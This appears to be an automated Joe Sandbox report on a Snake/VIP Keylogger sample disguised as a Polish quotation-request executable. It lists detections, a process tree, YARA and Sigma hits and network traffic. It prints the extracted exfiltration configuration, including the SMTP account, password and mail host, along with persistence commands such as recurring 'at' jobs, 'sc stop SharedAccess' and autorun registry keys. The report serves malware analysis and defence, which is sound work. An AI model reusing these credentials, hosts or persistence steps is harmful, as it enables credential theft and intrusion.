Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe

Overview

General Information

Sample name:ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe
Analysis ID:1544451
MD5:e9698d7f3a85335c8610cde2fecc54e8
SHA1:fbc277222d6971e42acaf87975b7b565b9b63a9e
SHA256:72292a987383f0079a0a846bae4ee6345f008f991a50f5f6d7fed2cad91339ad
Tags:exeuser-MarekSmar14
Infos:

Detection

CryptOne, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected CryptOne packer
Found malware configuration
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Creates an undocumented autostart registry key
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
PE file has a writeable .text section
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Interactive AT Job
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates processes with suspicious names
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Common Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe (PID: 1436 cmdline: "C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe" MD5: E9698D7F3A85335C8610CDE2FECC54E8)
    • zapytanie ofertowe st-2024-s315 cpa9170385.exe (PID: 1088 cmdline: "c:\users\user\desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe " MD5: 6A6157CD22CD9558F8579C30632E62C1)
      • RegSvcs.exe (PID: 5568 cmdline: "c:\users\user\desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe " MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • icsys.icn.exe (PID: 1352 cmdline: C:\Users\user\AppData\Local\icsys.icn.exe MD5: 30957BE4D1D5957A9D6433367CEF30EF)
      • explorer.exe (PID: 2920 cmdline: c:\windows\system\explorer.exe MD5: 40D6074239B5794D42186340C0FB7B60)
        • spoolsv.exe (PID: 5356 cmdline: c:\windows\system\spoolsv.exe SE MD5: 654CCF32F8E2748995C732C707A09AC1)
          • svchost.exe (PID: 6984 cmdline: c:\windows\system\svchost.exe MD5: EA31FB96DC9A76CAEFA570341CD194E2)
            • spoolsv.exe (PID: 1988 cmdline: c:\windows\system\spoolsv.exe PR MD5: 654CCF32F8E2748995C732C707A09AC1)
            • at.exe (PID: 4500 cmdline: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 1960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 4568 cmdline: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 1160 cmdline: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 7124 cmdline: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 5496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 432 cmdline: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 1848 cmdline: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 3092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 1436 cmdline: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
            • at.exe (PID: 5884 cmdline: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 3176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 4028 cmdline: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 7196 cmdline: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 7248 cmdline: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 7256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 7296 cmdline: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 7340 cmdline: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 7384 cmdline: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 7432 cmdline: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 7476 cmdline: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 7524 cmdline: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 7532 cmdline: sc stop SharedAccess MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 7540 cmdline: sc config Schedule start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 7556 cmdline: sc start Schedule MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 7892 cmdline: at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 7948 cmdline: at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 8000 cmdline: at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 8048 cmdline: at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 8084 cmdline: at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 8124 cmdline: at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 6488 cmdline: at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 7176 cmdline: at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • at.exe (PID: 7264 cmdline: at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
              • conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • explorer.exe (PID: 7804 cmdline: "C:\windows\system\explorer.exe" RO MD5: 40D6074239B5794D42186340C0FB7B60)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "spletnastran@tlakovec.si", "Password": "@nartsantelps", "Host": "mail.tlakovec.si", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "spletnastran@tlakovec.si", "Password": "@nartsantelps", "Host": "mail.tlakovec.si", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
0000000A.00000002.4486046867.0000000002ECE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 16 entries
            SourceRuleDescriptionAuthorStrings
            1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                  1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                    • 0x2de00:$a1: get_encryptedPassword
                    • 0x2e10d:$a2: get_encryptedUsername
                    • 0x2dc1e:$a3: get_timePasswordChanged
                    • 0x2dd19:$a4: get_passwordField
                    • 0x2de16:$a5: set_encryptedPassword
                    • 0x2f511:$a7: get_logins
                    • 0x2f474:$a10: KeyLoggerEventArgs
                    • 0x2f0d9:$a11: KeyLoggerEventArgsEventHandler
                    Click to see the 15 entries

                    System Summary

                    barindex
                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\icsys.icn.exe, ProcessId: 1352, TargetFilename: c:\windows\system\explorer.exe
                    Source: Process startedAuthor: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community: Data: Command: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe, CommandLine: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\at.exe, NewProcessName: C:\Windows\SysWOW64\at.exe, OriginalFileName: C:\Windows\SysWOW64\at.exe, ParentCommandLine: c:\windows\system\svchost.exe, ParentImage: C:\Windows\System\svchost.exe, ParentProcessId: 6984, ParentProcessName: svchost.exe, ProcessCommandLine: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe, ProcessId: 4500, ProcessName: at.exe
                    Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: c:\windows\system\svchost.exe, CommandLine: c:\windows\system\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System\svchost.exe, NewProcessName: C:\Windows\System\svchost.exe, OriginalFileName: C:\Windows\System\svchost.exe, ParentCommandLine: c:\windows\system\spoolsv.exe SE, ParentImage: C:\Windows\System\spoolsv.exe, ParentProcessId: 5356, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\system\svchost.exe, ProcessId: 6984, ProcessName: svchost.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: c:\windows\system\explorer.exe, CommandLine: c:\windows\system\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System\explorer.exe, NewProcessName: C:\Windows\System\explorer.exe, OriginalFileName: C:\Windows\System\explorer.exe, ParentCommandLine: C:\Users\user\AppData\Local\icsys.icn.exe, ParentImage: C:\Users\user\AppData\Local\icsys.icn.exe, ParentProcessId: 1352, ParentProcessName: icsys.icn.exe, ProcessCommandLine: c:\windows\system\explorer.exe, ProcessId: 2920, ProcessName: explorer.exe
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name): Data: Details: C:\Users\user\AppData\Roaming\mrsys.exe MR, EventID: 13, EventType: SetValue, Image: C:\Windows\System\explorer.exe, ProcessId: 2920, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999}\StubPath
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "c:\users\user\desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe " , CommandLine: "c:\users\user\desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe " , CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe , NewProcessName: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe , OriginalFileName: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe , ParentCommandLine: "C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe", ParentImage: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe, ParentProcessId: 1436, ParentProcessName: ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe, ProcessCommandLine: "c:\users\user\desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe " , ProcessId: 1088, ProcessName: zapytanie ofertowe st-2024-s315 cpa9170385.exe
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 212.44.112.138, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 5568, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49778
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: c:\windows\system\svchost.exe, CommandLine: c:\windows\system\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System\svchost.exe, NewProcessName: C:\Windows\System\svchost.exe, OriginalFileName: C:\Windows\System\svchost.exe, ParentCommandLine: c:\windows\system\spoolsv.exe SE, ParentImage: C:\Windows\System\spoolsv.exe, ParentProcessId: 5356, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\system\svchost.exe, ProcessId: 6984, ProcessName: svchost.exe
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: c:\windows\system\explorer.exe RO, EventID: 13, EventType: SetValue, Image: C:\Windows\System\explorer.exe, ProcessId: 2920, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer
                    Source: Process startedAuthor: vburov: Data: Command: c:\windows\system\svchost.exe, CommandLine: c:\windows\system\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System\svchost.exe, NewProcessName: C:\Windows\System\svchost.exe, OriginalFileName: C:\Windows\System\svchost.exe, ParentCommandLine: c:\windows\system\spoolsv.exe SE, ParentImage: C:\Windows\System\spoolsv.exe, ParentProcessId: 5356, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\system\svchost.exe, ProcessId: 6984, ProcessName: svchost.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-29T13:08:03.518436+010028033053Unknown Traffic192.168.2.549708188.114.96.3443TCP
                    2024-10-29T13:08:07.209909+010028033053Unknown Traffic192.168.2.549713188.114.97.3443TCP
                    2024-10-29T13:08:08.838907+010028033053Unknown Traffic192.168.2.549715188.114.97.3443TCP
                    2024-10-29T13:08:12.358955+010028033053Unknown Traffic192.168.2.549721188.114.97.3443TCP
                    2024-10-29T13:08:14.572060+010028033053Unknown Traffic192.168.2.549725188.114.97.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-29T13:08:00.817344+010028032742Potentially Bad Traffic192.168.2.549705132.226.247.7380TCP
                    2024-10-29T13:08:02.910971+010028032742Potentially Bad Traffic192.168.2.549705132.226.247.7380TCP
                    2024-10-29T13:08:04.656945+010028032742Potentially Bad Traffic192.168.2.549709132.226.247.7380TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeAvira: detected
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                    Source: C:\Windows\System\svchost.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                    Source: C:\Users\user\AppData\Local\stsys.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                    Source: C:\Windows\System\spoolsv.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                    Source: C:\Users\user\AppData\Roaming\mrsys.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                    Source: C:\Windows\System\explorer.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                    Source: 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "spletnastran@tlakovec.si", "Password": "@nartsantelps", "Host": "mail.tlakovec.si", "Port": "587", "Version": "4.4"}
                    Source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "spletnastran@tlakovec.si", "Password": "@nartsantelps", "Host": "mail.tlakovec.si", "Port": "587", "Version": "4.4"}
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeJoe Sandbox ML: detected
                    Source: C:\Windows\System\svchost.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\stsys.exeJoe Sandbox ML: detected
                    Source: C:\Windows\System\spoolsv.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\mrsys.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Joe Sandbox ML: detected
                    Source: C:\Windows\System\explorer.exeJoe Sandbox ML: detected
                    Source: ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 192.168.2.5:49718 -> 188.114.97.3:443 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 51.81.194.202:443 -> 192.168.2.5:49719 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49724 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49729 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 40.69.42.241:443 -> 192.168.2.5:60455 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:60467 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.5:60480 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.5:60489 version: TLS 1.2
                    Source: Binary string: wntdll.pdbUGP source: zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000003.2051235689.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000003.2047915436.0000000004540000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000003.2051235689.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000003.2047915436.0000000004540000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_00452126
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,1_2_0045C999
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,1_2_00436ADE
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00434BEE
